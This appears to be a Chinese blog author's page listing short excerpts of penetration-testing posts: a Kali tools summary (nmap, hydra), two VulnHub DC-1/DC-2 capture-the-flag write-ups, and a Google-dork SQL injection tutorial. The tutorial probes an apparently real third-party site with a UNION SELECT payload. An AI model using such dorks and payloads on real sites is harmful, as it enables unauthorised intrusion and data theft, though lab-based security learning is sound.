渗透测试
baby-shark
这个作者很懒,什么都没留下…
展开
-
利用Google手工挖SQL注入漏洞
SQL注入挖洞教程挂上代理。访问谷歌www、google、comA inurl:news-detail.php?id=添加单引号。确认是否存在SQL注入漏洞http://belbana.com/news-detail.php?id=3’3构建URL查询数据库名字。http://belbana.com/news-detail.php?id=3%20and%201=2 UNION SELECT 1,2,3,user(),5,6,7...原创 2020-05-25 17:59:39 · 3086 阅读 · 0 评论 -
kali常用软件-总结
kali里常用的软件1.nmap 信息收集nmap -sP 192.168.71.0/24 #ping扫描192.168.71.0这个网段的存活主机nmap -A 192.168.71.141 -p- -oN nmap-a.txt # 收集192.168.71.141这台机器的信息。并保存在当前目录的nmap-a.txt2.hydra 密码爆破密码字典的位...原创 2020-01-05 15:33:07 · 3764 阅读 · 0 评论 -
夺旗游戏:dc1夺旗总结
环境:www.vulnhub.com下载靶机VMware导入虚拟机1.把dc1的网络设置为nat模式,记录一下mac地址 。把kali也设置为nat模式 用kali扫描发现主机。 先看自己的IP地址:ifconfig 扫描命令:nmap -sP 192.168.71.0/24 ,发现有dc1的IP地址是:192.168.71.135 nmap -A 192.168....原创 2020-01-05 14:56:40 · 510 阅读 · 0 评论 -
夺旗游戏:dc2夺旗总结
2020-1-5 总结靶机下载地址:www.vulnhub.comdc2靶机测试:为了方便以后多次实验。虚拟机都做好快照用VMware虚拟机打开dc2 ,网卡调整到nat模式。查看mac地址。记录下来:00:0C:29:5D:32:42开一台kali虚拟机。同样调整到nat模式。这样的话2台主机都在同一个局域网了。为了方便以后多次实验。虚拟机都做好快照2台虚拟机开机在kali上...原创 2020-01-05 14:53:06 · 707 阅读 · 0 评论